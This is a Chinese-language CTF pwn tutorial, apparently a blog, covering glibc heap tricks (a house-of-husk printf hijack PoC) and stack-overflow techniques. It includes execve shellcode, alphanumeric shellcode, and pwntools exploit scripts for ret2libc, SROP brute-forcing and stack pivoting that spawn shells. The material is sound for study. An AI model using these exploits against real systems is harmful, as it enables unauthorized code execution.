fini可以控制到一个函数执行,一般用one_gadget 直接修改libc的__libc_atexit节或者elf的fini_array 然而一个很现实的问题是这两个东西在高版本都已经不可写了 printf-fmt 这一条链来自house of husk的攻击手法 主要是对libc格式化字符串解析过程的攻击。 先看libc是如何解析格式化字符传,通过跟踪调试可以发现,其解析字符是 printf_positional 12345#ifdef COMPILE_WPRINTF nargs += __parse_one_specwc (f, nargs, &specs[nspecs], &max_ref_arg);#else nargs += __parse_one_specmb (f, nargs, &specs[nspecs], &max_ref_arg);#endif 此函数里面通过 __parse_one_cmb 解析格式化字符串,并将其转换为相应specs结构体。 1234567891011spec->info.spec = (wchar_t) *format++;spec->size = -1;if (__builtin_expect (__printf_function_table == NULL, 1) || spec->info.spec > UCHAR_MAX || __printf_arginfo_table[spec->info.spec] == NULL /* We don't try to get the types for all arguments if the formatuses more than one. The normal case is covered though. Ifthe call returns -1 we continue with the normal specifiers. 
*/ || (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec]) (&spec->info, 1, &spec->data_arg_type, &spec->size)) < 0) 而在这个解析函数存在这样一个亮点 如果__printf_function_table != 0 并且__printf_arginfo_table[spec->info.spec] != 0 那么就会调用 __printf_arginfo_table[spec->info.spec] 这里的info->spec就是我们的格式化字符(例如’s’, ‘d’) 查看这两个地址: 123456789101112131415161718192021222324252627282930pwndbg> vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x400000 0x401000 r--p 1000 0 /home/nemo/Pwn/workspace/basic_overflow/num 0x401000 0x402000 r-xp 1000 1000 /home/nemo/Pwn/workspace/basic_overflow/num 0x402000 0x403000 r--p 1000 2000 /home/nemo/Pwn/workspace/basic_overflow/num 0x403000 0x404000 r--p 1000 2000 /home/nemo/Pwn/workspace/basic_overflow/num 0x404000 0x405000 rw-p 1000 3000 /home/nemo/Pwn/workspace/basic_overflow/num 0x7ffff7dc4000 0x7ffff7dc6000 rw-p 2000 0 [anon_7ffff7dc4] 0x7ffff7dc6000 0x7ffff7dec000 r--p 26000 0 /usr/lib64/libc.so.6 0x7ffff7dec000 0x7ffff7f49000 r-xp 15d000 26000 /usr/lib64/libc.so.6 0x7ffff7f49000 0x7ffff7f96000 r--p 4d000 183000 /usr/lib64/libc.so.6 0x7ffff7f96000 0x7ffff7f9a000 r--p 4000 1d0000 /usr/lib64/libc.so.6 0x7ffff7f9a000 0x7ffff7f9c000 rw-p 2000 1d4000 /usr/lib64/libc.so.6 0x7ffff7f9c000 0x7ffff7fa6000 rw-p a000 0 [anon_7ffff7f9c] 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0x7ffff7fca000 0x7ffff7fcb000 r--p 1000 0 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7fcb000 0x7ffff7ff1000 r-xp 26000 1000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ff1000 0x7ffff7ffb000 r--p a000 27000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffb000 0x7ffff7ffd000 r--p 2000 30000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffd000 0x7ffff7fff000 rw-p 2000 32000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffffffdd000 0x7ffffffff000 rw-p 22000 0 [stack]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg> p &__printf_arginfo_table $8 = (printf_arginfo_size_function ***) 0x7ffff7f9b8b0 <__printf_arginfo_table>pwndbg> p __printf_function_table $9 = (printf_function **) 0x1000pwndbg> p &__printf_function_table $10 = (printf_function ***) 0x7ffff7f9c9a0 <__printf_function_table> 可以看到这两个的地址都是libc地址,如果存在两个libc任意写,就可以实现劫持。 不过其第一个参数是 spec->info, info的第一个成员是格式化的输出长度,如果没有指定,就是-1。 然而,一般程序是不会让你控制输出长度(也就是格式化字符前面的数字),所以并没有什么用处,大概率你是控制不了的,只能打one_gadgat。 写了个poc验证: 12345678910111213141516171819202122#include <stdio.h>int main(){ printf("Init Got"); void *libc = *(unsigned long long *)0x404000-0x55c20; printf("Libc: %p\\n", libc); unsigned long long fake_arginfo[0x100] = {0}; fake_arginfo['s'] = libc + 0x4f390; // system //fake_arginfo['s'] = libc + 0xfb41f; unsigned long long *print_function = libc + 0x1d69a0; unsigned long long *print_arginfo = libc + 0x1d58b0; *print_arginfo = fake_arginfo; *print_function = 0x100; printf("Enter a number: %6845243s"); // u32(b';sh\\x00') = 6845243 // printf("Enter a number: %1"); return 0;} 辅助攻击 tcache_perthread_struct 1234567891011/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. 
*/typedef struct tcache_perthread_struct{ uint16_t counts[TCACHE_MAX_BINS]; // 2*0x40 = 0x80 tcache_entry *entries[TCACHE_MAX_BINS]; // 8*0x40 = 0x200} tcache_perthread_struct;// 0x20+0x10*0x40 = 0x420 tcache_perthread_struct 是tcache的管理机构,也存在于堆中,如果想办法控制此结构体,即可控制tcache任意分配。 在glibc2.30以下的版本,counts的类型是char,此结构大小是0x250。 一般是作为辅助攻击的方法,可以简化攻击链。 example [[2021-DownUnder-note]] global_max_fast 实际上就是house of corrison的利用,类似的,tcache也有类似的利用。使得大chunk被当作tcache处理。 heap_info 直接攻击堆管理结构体,可以看看这篇帖子:house-of-mind #TODO Tricks 多线程堆 堆布局与分配 以下基于libc 2.35版本讲述 12345678910111213141516171819202122232425262728293031pwndbg> vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x56234a398000 0x56234a399000 r--p 1000 0 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a399000 0x56234a39a000 r-xp 1000 1000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39a000 0x56234a39b000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39b000 0x56234a39c000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39c000 0x56234a39f000 rw-p 3000 3000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234b28e000 0x56234b2af000 rw-p 21000 0 [heap] 0x7fc4627fd000 0x7fc4627fe000 ---p 1000 0 [anon_7fc4627fd] 0x7fc4627fe000 0x7fc462ffe000 rw-p 800000 0 [anon_7fc4627fe] 0x7fc462ffe000 0x7fc462fff000 ---p 1000 0 [anon_7fc462ffe] 0x7fc462fff000 0x7fc4637ff000 rw-p 800000 0 [anon_7fc462fff] 0x7fc4637ff000 0x7fc463800000 ---p 1000 0 [anon_7fc4637ff] 0x7fc463800000 0x7fc464000000 rw-p 800000 0 [anon_7fc463800] 0x7fc464000000 0x7fc464021000 rw-p 21000 0 [anon_7fc464000] 0x7fc464021000 0x7fc468000000 ---p 3fdf000 0 [anon_7fc464021] 0x7fc4685fa000 0x7fc4685fb000 ---p 1000 0 [anon_7fc4685fa] 0x7fc4685fb000 0x7fc468dfb000 rw-p 800000 0 [anon_7fc4685fb] 0x7fc468dfb000 0x7fc468dfc000 ---p 1000 0 [anon_7fc468dfb] 0x7fc468dfc000 0x7fc4695fc000 rw-p 800000 0 [anon_7fc468dfc] 0x7fc4695fc000 0x7fc4695fd000 ---p 1000 0 [anon_7fc4695fc] 0x7fc4695fd000 0x7fc469dfd000 rw-p 800000 0 [anon_7fc4695fd] 0x7fc469dfd000 0x7fc469dfe000 ---p 1000 0 [anon_7fc469dfd] 0x7fc469dfe000 0x7fc46a5fe000 rw-p 800000 0 [anon_7fc469dfe] 0x7fc46a5fe000 0x7fc46a5ff000 ---p 1000 0 [anon_7fc46a5fe] 0x7fc46a5ff000 0x7fc46adff000 rw-p 800000 0 [anon_7fc46a5ff] 0x7fc46adff000 0x7fc46ae00000 ---p 1000 0 [anon_7fc46adff] 0x7fc46ae00000 0x7fc46b600000 rw-p 800000 0 [anon_7fc46ae00] 0x7fc46b600000 0x7fc46b628000 r--p 28000 0 /home/nemo/Pwn/workspace/2023ycb/heap/libc-3.35.so 在线程分配空间时,会从线程堆中分配,但并不是每一个线程都有一个单独的线程堆,arena存在一个上限。 在上述程序中,线程堆的地址就是 0x7fc464000000 开始的这一部分。 查看此线程堆的组成: 123456789pwndbg> telescope 0x7fc46400000000:0000│ 0x7fc464000000 —▸ 0x7fc464000030 ◂— 0x20000000001:0008│ 0x7fc464000008 ◂— 0x002:0010│ 0x7fc464000010 ◂— 0x2100003:0018│ 0x7fc464000018 ◂— 0x2100004:0020│ 0x7fc464000020 ◂— 0x100005:0028│ 0x7fc464000028 ◂— 0x006:0030│ 0x7fc464000030 ◂— 0x20000000007:0038│ 0x7fc464000038 ◂— 0x1 可以看出前0x30 的部分,是mmap分配出的内存的header。 继续往下查看: 12345678910111213141516pwndbg> arena 0x7fc464000030 { mutex = 0, flags = 2, have_fastchunks = 1, fastbinsY = {0x7fc464000e10, 0x0, 0x0, 0x0, 0x7fc464000e30, 0x0, 0x0, 0x0, 0x0, 0x0}, top = 0x7fc464000fa0, last_remainder = 0x0, bins = {....} binmap = {0, 0, 0, 0}, next = 0x7fc46b819c80 <main_arena>, next_free = 0x0, attached_threads = 0, system_mem = 135168, max_system_mem = 135168,} 可以看出从0x30开始,就是线程堆的arena 123456789101112131415pwndbg> heap 0x7fc4640008d0 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x7fc4640008d0 Size: 0x291 fd: 0x7fc464000090 bk: 0x7fc464000090Allocated chunk | NON_MAIN_ARENA Addr: 
0x7fc464000b60 Size: 0x24Allocated chunk | PREV_INUSE | NON_MAIN_ARENA Addr: 0x7fc464000b80 Size: 0x75Allocated chunk | PREV_INUSE | NON_MAIN_ARENA Addr: 0x7fc464000bf0 Size: 0x25 继续往下查看,可以看到有一个0x290大小的堆块,应该是tcache 的管理结构体,为什么是free状态呢? 笔者暂且还没有探究,不过,经过笔者的测试,在此时,分配chunk也并不走tcache,而是直接走fastbin 。 #TODO 调试 查找多线程arena: 123> arena# 查看其next指针> arena <next_addr> 查看多线程heap: 12> heap <start_addr> # 起始地址,一般偏移为0x8d0","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"}]},{"title":"Pwn.Stack-Overflow-Overview","slug":"Pwn.Stack-Overflow-Overview","date":"2022-08-02T16:00:00.000Z","updated":"2024-02-28T15:02:54.692Z","comments":true,"path":"Pwn.Stack-Overflow-Overview/","link":"","permalink":"https://v3rdant.cn/Pwn.Stack-Overflow-Overview/","excerpt":"杂谈 作为一种基本的漏洞,栈溢出在CTF中出现的非常频繁,因为其多样化的利用形式,难以进行系统的归类,本文结合笔者个人的经验,综合讨论各种栈溢出技术,如果有遗漏,欢迎评论留言,或者给笔者发邮件,进行补充。","text":"杂谈 作为一种基本的漏洞,栈溢出在CTF中出现的非常频繁,因为其多样化的利用形式,难以进行系统的归类,本文结合笔者个人的经验,综合讨论各种栈溢出技术,如果有遗漏,欢迎评论留言,或者给笔者发邮件,进行补充。 本文一定程度上参考了各种博客,CTF-wiki, CTF-All-in-One 怎么去看待栈溢出题呢? 尽管利用方法多样,但是,就笔者个人的看法而言,整个栈溢出实际上只分为三种: ret2syscall, ret2libc, ret2shellcode 实际上应该还有ret2text, 然而实在过于简单,一般不会在ctf题目中出现。 一般而言,pwn题的目的都是getshell(当然,也有直接读取flag的,这个后面单独谈),而getshell 无外乎就三种途径,syscall,libc-system,shellcode 当拿到一个题目时,首先思考: 是否有syscall---->ret2syscall 有可读可写内存空间吗---->ret2shellcode 给了libc文件或者有信息泄露函数(IO函数)---->ret2libc 接下来,再分门别类谈: ret2syscall 因为syscall属于相对简单的,暂且放在前面谈。 %rax System call %rdi %rsi %rdx %r10 %r8 %r9 59 sys_execve const char *filename const char *const argv[] const char *const envp[] 一般而言,需要syscall的题目中,都是构造这个系统调用实现。 而在一些题目中通过seccomp禁用了execve的调用,所以不能直接利用,那么就利用open, read, write 直接读取flag文件,也是一种办法。 而在syscall中,最为重要也是最麻烦的一步,就是在哪个地址写入/bin/sh(如果本地文件没有/bin/sh的话),一般而言,有三个选择,.data, .bss, 栈上。 在没开PIE的程序中,可以考虑通过write写入.data段或者买.bss段。 或者考虑通过rsp获取栈上地址,或者partial overwrite带出栈上地址。 总的而言,就是选择能够获取到地址的地方写入/bin/sh。 例题: ciscn_s_3 ret2shellcode shellcode的书写 一般而言,可以直接通过pwntools 相应模块直接生成shellcode,然而现在以shellcode为考点的题目,一般都会对shellcode做出限制,诸如不能包含非可打印字符, 不能包含"\\x00"等等。所以尽可能自己熟悉shellcode的书写。 一个简单的shellcode例子: 123456789101112131415161718192021// execve(path = '/bin///sh', argv = ['sh'], envp = 0)push 0x68mov rax, 0x732f2f2f6e69622fpush raxmov rdi, rsp// push argument array ['sh\\x00']// push b'sh\\x00' push 0x1010101 ^ 0x6873xor dword ptr [rsp], 0x1010101xor esi, esi /* 0 */push rsi /* null terminate */push 8pop rsiadd rsi, rsppush rsi /* 'sh\\x00' */mov rsi, rspxor edx, edx /* 0 */// call execve()push SYS_execve /* 0x3b */pop raxsyscall 这里获取/bin/sh地址的方式,是将其压入栈中,再通过rsp偏移获取相应地址。 不过一般而言,pwn题目运行shellcode,一般是采用寄存器跳转,即jmp rax此类,那么其实可以通过跳转寄存器获取shellcode存放地址,并且将/bin/sh直接镶入shellcode后面,简化shellcode书写。 同时,有些题目会对shellcode有所限制,限制只能包含可打印字符或者纯粹字母数字。这就限制了shellcode的书写,mov和syscall都会遭到限制, 可用指令如下: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768691.数据传送:push/pop eax…pusha/popa2.算术运算:inc/dec eax…sub al, 立即数sub byte ptr [eax… + 立即数], al dl…sub byte ptr [eax… + 立即数], ah dh…sub dword ptr [eax… + 立即数], esi edisub word ptr [eax… + 立即数], si disub al dl…, byte ptr [eax… + 立即数]sub ah dh…, byte ptr [eax… + 立即数]sub esi edi, dword ptr [eax… + 立即数]sub si di, word ptr [eax… + 立即数]3.逻辑运算:and al, 立即数and dword ptr [eax… + 立即数], esi ediand word ptr [eax… + 立即数], si diand ah dh…, byte ptr [ecx edx… + 立即数]and esi edi, dword ptr [eax… + 立即数]and si di, word ptr [eax… + 立即数]xor al, 立即数xor byte ptr 
[eax… + 立即数], al dl…xor byte ptr [eax… + 立即数], ah dh…xor dword ptr [eax… + 立即数], esi edixor word ptr [eax… + 立即数], si dixor al dl…, byte ptr [eax… + 立即数]xor ah dh…, byte ptr [eax… + 立即数]xor esi edi, dword ptr [eax… + 立即数]xor si di, word ptr [eax… + 立即数]4.比较指令:cmp al, 立即数cmp byte ptr [eax… + 立即数], al dl…cmp byte ptr [eax… + 立即数], ah dh…cmp dword ptr [eax… + 立即数], esi edicmp word ptr [eax… + 立即数], si dicmp al dl…, byte ptr [eax… + 立即数]cmp ah dh…, byte ptr [eax… + 立即数]cmp esi edi, dword ptr [eax… + 立即数]cmp si di, word ptr [eax… + 立即数]5.转移指令:push 56hpop eaxcmp al, 43hjnz lable<=> jmp lable6.交换al, ahpush eaxxor ah, byte ptr [esp] // ah ^= alxor byte ptr [esp], ah // al ^= ahxor ah, byte ptr [esp] // ah ^= alpop eax7.清零:push 44hpop eaxsub al, 44h ; eax = 0push esipush esppop eaxxor [eax], esi ; esi = 0 一般而言, 我们采用xor或者sub指令修改shellcode后面的值,构造0f 05, 实现syscall。 一个例子(纯字母数字shellcode): 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455// ref: https://hama.hatenadiary.jp/entry/2017/04/04/190129/* from call rax */push raxpush raxpop rcx/* XOR pop rsi, pop rdi, syscall */push 0x41413030pop raxxor DWORD PTR [rcx+0x30], eax/* XOR /bin/sh */push 0x34303041pop raxxor DWORD PTR [rcx+0x34], eaxpush 0x41303041pop raxxor DWORD PTR [rcx+0x38], eax/* rdi = &'/bin/sh' */push rcxpop raxxor al, 0x34push rax/* rdx = 0 */push 0x30pop raxxor al, 0x30push raxpop rdxpush rax/* rax = 59 (SYS_execve) */push 0x41pop raxxor al, 0x7a/* pop rsi, pop rdi*//* syscall */ .byte 0x6e.byte 0x6f.byte 0x4e.byte 0x44/* /bin/sh */.byte 0x6e.byte 0x52.byte 0x59.byte 0x5a.byte 0x6e.byte 0x43.byte 0x5a.byte 0x41 构造尽可能短的shellcode可能用到的一些指令 1234cdp %The CDQ instruction copies the sign (bit 31) %of the value in the EAX register into every bit %position in the EDX register. shellcode生成工具 同时,现在有多种针对shellcode进行编码的生成工具,生成符合限制的shellcode,如msf,alpha3等等,由于我没有用过,可以自行尝试。 mprotect() 进一步的,很多题目没有天然的readable and executable segment,题目可能通过mmap()映射了一段权限为7的段,或者存在mprotect()函数。 这个函数可以修改指定内存段的权限 12345mprotect:int mprotect(void *addr, size_t len, int prot);addr 内存起始地址len 修改内存的长度prot 内存的权限,7为可读可写可执行 如果存在这样的函数,可以考虑将其加入ROP链,从而进一步调用shellcode ret2libc leak_libc 对于最后调用 libc 中 system 的题目而言,需要考虑的首要问题就是leak_libc. 
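在展开之前,先给出一个最常见情形下的最小示意脚本,对应下文第二种方法:用 puts 打印某个 GOT 表项泄露真实地址,再算出 libc 基址。其中 ./vuln、libc.so.6、溢出偏移 offset 与 pop rdi gadget 地址都是假设的占位,需按题目实际情况替换,接收泄露前可能还要先把菜单输出读掉。
from pwn import *

elf  = ELF('./vuln')          # 假设:无 PIE 的目标程序
libc = ELF('./libc.so.6')     # 假设:题目给出的 libc
p    = process('./vuln')

offset  = 0x28                # 假设:覆盖到返回地址所需的填充长度
pop_rdi = 0x400743            # 假设:ROPgadget 找到的 pop rdi ; ret

# 第一段 ROP:puts(puts@got) 打印真实地址,然后回到 main 以便二次溢出
payload  = b'A' * offset
payload += p64(pop_rdi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(elf.symbols['main'])
p.sendline(payload)

leak = u64(p.recvline().strip().ljust(8, b'\\x00'))
libc.address = leak - libc.symbols['puts']   # 泄露值减去符号偏移得到 libc 基址
log.info('libc base: %#x' % libc.address)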
目前而言,我遇到的栈题中leak_libc,有两种方法: partial_overwrite, 有时候,在栈中会存留libc中地址,在后面存在直接输出的函数的情况下,可以带出此地址。 通过puts,write等函数,打印.got,获取对应函数的地址,这里,在没有给定对应libc版本的情况下,也可以通过LibcSearcher查找对应libc版本 1234567891011# ref: https://github.com/lieanu/LibcSearcherfrom LibcSearcher import *#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型obj = LibcSearcher("fgets", 0X7ff39014bd90)obj.dump("system") #system 偏移obj.dump("str_bin_sh") #/bin/sh 偏移obj.dump("__libc_start_main_ret") 另一个可以本地部署的实用工具是libc-database 12345678910111213141516$ ./find printf 260 puts f30archive-glibc (libc6_2.19-10ubuntu2_i386)$ ./dump libc6_2.19-0ubuntu6.6_i386offset___libc_start_main_ret = 0x19a83offset_system = 0x00040190offset_dup2 = 0x000db590offset_recv = 0x000ed2d0offset_str_bin_sh = 0x160a24$ ./identify bid=ebeabf5f7039f53748e996fc976b4da2d486a626libc6_2.17-93ubuntu4_i386$ ./identify md5=af7c40da33c685d67cdb166bd6ab7ac0libc6_2.17-93ubuntu4_i386$ ./identify sha1=9054f5cb7969056b6816b1e2572f2506370940c4libc6_2.17-93ubuntu4_i386$ ./identify sha256=8dc102c06c50512d1e5142ce93a6faf4ec8b6f5d9e33d2e1b45311aef683d9b2libc6_2.17-93ubuntu4_i386 partial_overwrite 前置知识 针对没有泄露的赛题,可以考虑partial_overwrite改写got表,实现system,因为一般而言,大部分libc函数,里面都存在syscall,所以syscall偏移和函数head_addr差别不会太大。 考虑对于一个got表中的64位地址: 0xXXXXXXXXXXXXX, 假设其附近的syscall地址后三位偏移为0xaaa(请确定这个偏移和got内函数偏移只有最后四个16位数字不同), 因为libc装载地址以页为单位,后三位是确定0x000,那么partial_overwrite覆盖后面两个字节, 即覆盖got为0xXXXXXXXXfaaa,那么有1/16的几率恰好syscall 爆破脚本写法 一个爆破脚本模板: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import *import syself ='./ciscn_s_3'remote_add = 'node4.buuoj.cn'remote_port = 29554main_add = 0x40051doff = 0x130system_add = 0x400517rtframe = 0x4004daret_add = 0x4004e9i = 0while i < 20: try: context.log_level = 'debug' context.arch = 'amd64' if sys.argv[1] == 'r': p = remote(remote_add, remote_port, timeout = 1) elif sys.argv[1] == 'd': p = gdb.debug(elf) else: p = process(elf, timeout = 1) payload1 = b'/bin/sh\\0' + cyclic(0x8) payload1+= p64(main_add) p.sendline(payload1) stack_add = u64(p.recv(0x28)[-8::]) - off frame = SigreturnFrame() frame.rax = 0x3b frame.rdi = stack_add frame.rsi = 0 frame.rdx = 0 frame.rsp = stack_add frame.rip = system_add payload = b'/bin/sh\\0' + cyclic(0x8) payload+= p64(rtframe) payload+= p64(system_add) payload+= bytes(frame) #p.sendline('a') #p.recvuntil('\\0') p.sendline(payload) p.recvuntil('/bin/sh') p.sendline('cat flag') print(p.recvline()) p.close() except BaseException as e: p.close() off+=0x8 i+=1 核心模板: 1234567891011while True: try: // p = process() // pass p.sendline('cat flag') print(p.recvline()) p.close() except BaseException as e: p.close() // pass 采用grep 获取输出包含flag的行就行 ret2dl_resolve() 延迟绑定会使用_dl_resolve()函数 _dl_resolve中 _dl_resolve调用_dl_fixup, _dl_dixup流程: 通过link_map 获得.dynsym、.dynstr、.rel.plt地址 通过reloc_offset + ret.plt地址获得函数对应的Elf64_Rel指针 通过&(ELF64_Rel)->r_info 和.dynsym取得对应Elf64_Sym指针 检查r_info 检查&(Elf64_Sym)->st_other 通过strtab(DT_STRTAB中的地址)+st_name(.dymsym中的偏移)获得函数对应的字符串,进行查找,找到后赋值给rel_addr,最后调用这个函数 综合而言,有如下利用方法(参考CTF-wiki,主要是第三种,因为存在信息泄露时,可用其他方法) 修改 dynamic 节的内容 修改重定位表项的位置 伪造 linkmap 主要前提要求 无 无 无信息泄漏时需要 libc 适用情况 NO RELRO NO RELRO, Partial RELRO NO RELRO, Partial RELRO 注意点 确保版本检查通过;确保重定位位置可写;确保重定位表项、符号表、字符串表一一对应 确保重定位位置可写;需要着重伪造重定位表项、符号表; Tricks ret2csu csu主要是为了控制rdx,一般如果gadget较少, 可能没有直接rdx, 一个典型的csu如下 123456789101112131415161718.text:0000000000400940 loc_400940: ; CODE XREF: __libc_csu_init+54↓j.text:0000000000400940 mov rdx, r15.text:0000000000400943 mov rsi, r14.text:0000000000400946 mov edi, r13d.text:0000000000400949 
call ds:(__frame_dummy_init_array_entry - 600D90h)[r12+rbx*8].text:000000000040094D add rbx, 1.text:0000000000400951 cmp rbp, rbx.text:0000000000400954 jnz short loc_400940.text:0000000000400956.text:0000000000400956 loc_400956: ; CODE XREF: __libc_csu_init+34↑j.text:0000000000400956 add rsp, 8.text:000000000040095A pop rbx.text:000000000040095B pop rbp.text:000000000040095C pop r12.text:000000000040095E pop r13.text:0000000000400960 pop r14.text:0000000000400962 pop r15.text:0000000000400964 retn 那么通过0x400956和0x400940的组合,就可以控制rdx 了。 将r12+rbx*8 控制为一个无效got表项,并且令rbx比rbp大1,就可以循环劫持控制流了。 stack pivoting 栈迁移技巧, 主要针对可溢出字节较少的情况,通过leave此类指令控制rsp 123456;leave 相当于:mov rsp,rbppop rbp;那么考虑将栈帧中rbp地址改为栈迁移目的地址;leave两次之后,就可以将栈转移到目的地址;同时要现在目的地址布置好fake_stack 可以知道,栈迁移的前提在于,需要提前布置好栈帧,即在.bss , 或者.data等段写入,一般要求前面有读取到.data段的函数 不过,现在栈迁移一般会稍微复杂一些,读取类函数(如read)和leave可能在一个栈帧,这就要求我们在劫持read写入到指定地址的同时,实现分段栈迁移,大致流程如下: 在第一次read读入后将rbp改为要写入的位置 ret到read 第二次read读入的数据将rbp改为写入的ROP链的位置,注意leave后的指令位置会加8 这个leave的加8会把我们的rip指向我们第二次写入时的ret位置,只要我们第二次写入的ret位置指向leave,就实现了第二次的栈迁移,迁移到了第二次写入的ROP链的位置 example 一个程序反汇编后: 12345678910111213int __cdecl main(int argc, const char **argv, const char **envp){ char s[48]; // [rsp+0h] [rbp-30h] BYREF init(argc, argv, envp); puts("You can use stackoverflow."); puts("But only overflow a bit more..."); puts("And you must print first."); memset(s, 0, 0x20uLL); write(1, s, 0x30uLL); read(0, s, 0x40uLL); return 0;} 这个题目本身比较简单,本身给了你一个泄露,又只开了PIE,通过这个write的泄露可以拿到libc地址,考虑到题目还给了libc,预期解可能是找libc里面的/bin/sh字符串 但是既然没有开PIE,就没有必要这么麻烦了,直接在数据段写入/bin/sh就行 虽然大致脚本很早就写完了,但是运行发现了一些令人无语的错误 exp 1234567891011121314151617181920212223242526from pwn import*p = process('./ezrop')#p = gdb.debug('./ezrop')m = u64(p.recv(40)[-8:])payloads = p64(0x400863) + b'/bin/sh\\0' + p64(0x400600)payloads += cyclic(0x18)payloads += p64(0x601848+0x30) + p64(0x4007d9)p.send(payloads)sleep(1)payloads = p64(0x4006fa) + p64(0x400863) + p64(0x601868) + p64(0x400600) payloads += b'/bin/sh\\0'payloads += b'/bin/sh\\0'payloads += p64(0x601848-0x8) + p64(0x4007f9)p.send(payloads)p.interactive()#0x00007f7b3ce92bb0 0x00007f7b3ccf8450 栈对齐 栈对齐是xmm指令的一个特性,网上对于这个特性的解释很多都是错误的,还把它与栈平衡搞混了。 这个特性来源于xmm相关指令需要内存对齐,当程序运行到这些指令时,如果内存不是16位对齐,就会直接coredump 可以: 1$ gdb -c core 调试core文件 如果终止指令类似于: 1► 0x7fa8677a3396 movaps xmmword ptr [rsp + 0x40], xmm0 说明是栈对齐的原因,小心调整栈帧就行 Stack smash 对于某些将flag装载到内存,并且知道flag的地址、开启了cannary的题目而言,可以考虑stack_smash。 在开启cannary 防护的题目中,检测到栈溢出后,会调用 __stack_chk_fail 函数来打印 argv[0] (在栈上,和环境变量在一起)指针所指向的字符串,而这个地址可以被覆盖,因此,可以利用此实现泄露flag 在链接高版本libc的情况下,已经不会再打印 argv[0] 了, 此方法已经失效 SROP 前置知识: 在进程接收到signal时,内核会将其上下文保存位sigFrame,然后进入signal_handle,对信号处理,返回后,会执行sigreturn调用,恢复保存Frame,主要包括寄存器和控制流(rip,rsp)的一些设置。 那么,当我们伪造一个Frame,并且触发sigreturn调用时,就能控制寄存器和控制流,这也就是SROP的本质。 同一般rop链相比,可以自由控制rax,进一步的,可以自由控制系统调用,所以SROP拓展了ROP的attack methods。 SROP简要流程: 构造fake_frame 控制当前rsp指向fake_frame底部 sigreturn调用 sigFrame结构如下: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152// x64struct _fpstate{ /* FPU environment matching the 64-bit FXSAVE layout. 
*/ __uint16_t cwd; __uint16_t swd; __uint16_t ftw; __uint16_t fop; __uint64_t rip; __uint64_t rdp; __uint32_t mxcsr; __uint32_t mxcr_mask; struct _fpxreg _st[8]; struct _xmmreg _xmm[16]; __uint32_t padding[24];};struct sigcontext{ __uint64_t r8; __uint64_t r9; __uint64_t r10; __uint64_t r11; __uint64_t r12; __uint64_t r13; __uint64_t r14; __uint64_t r15; __uint64_t rdi; __uint64_t rsi; __uint64_t rbp; __uint64_t rbx; __uint64_t rdx; __uint64_t rax; __uint64_t rcx; __uint64_t rsp; __uint64_t rip; __uint64_t eflags; unsigned short cs; unsigned short gs; unsigned short fs; unsigned short __pad0; __uint64_t err; __uint64_t trapno; __uint64_t oldmask; __uint64_t cr2; __extension__ union { struct _fpstate * fpstate; __uint64_t __fpstate_word; }; __uint64_t __reserved1 [8];}; pwntools.srop pwntools集成了SROP的模块,可以帮助制作fake_frame: 12345678// 一个简单的例子sigframe = SigreturnFrame()sigframe.rax = constants.SYS_readsigframe.rdi = 0sigframe.rsi = stack_addrsigframe.rdx = 0x400sigframe.rsp = stack_addrsigframe.rip = syscall_ret stack_gaurd 我们都知道canary来自fs:0x28, fs 实际上指向的是TCB , TCB结构如下 12345678910111213141516171819202122232425262728typedef struct{ void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; int gscope_flag; // not in 32bit uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; unsigned long int vgetcpu_cache[2]; /* Bit 0: X86_FEATURE_1_IBT. Bit 1: X86_FEATURE_1_SHSTK. */ unsigned int feature_1; int __glibc_unused1; /* Reservation of some values for the TM ABI. */ void *__private_tm[4]; /* GCC split stack support. */ void *__private_ss; /* The lowest address of shadow stack, */ unsigned long long int ssp_base; /* Must be kept even if it is no longer used by glibc since programs, like AddressSanitizer, depend on the size of tcbhead_t. 
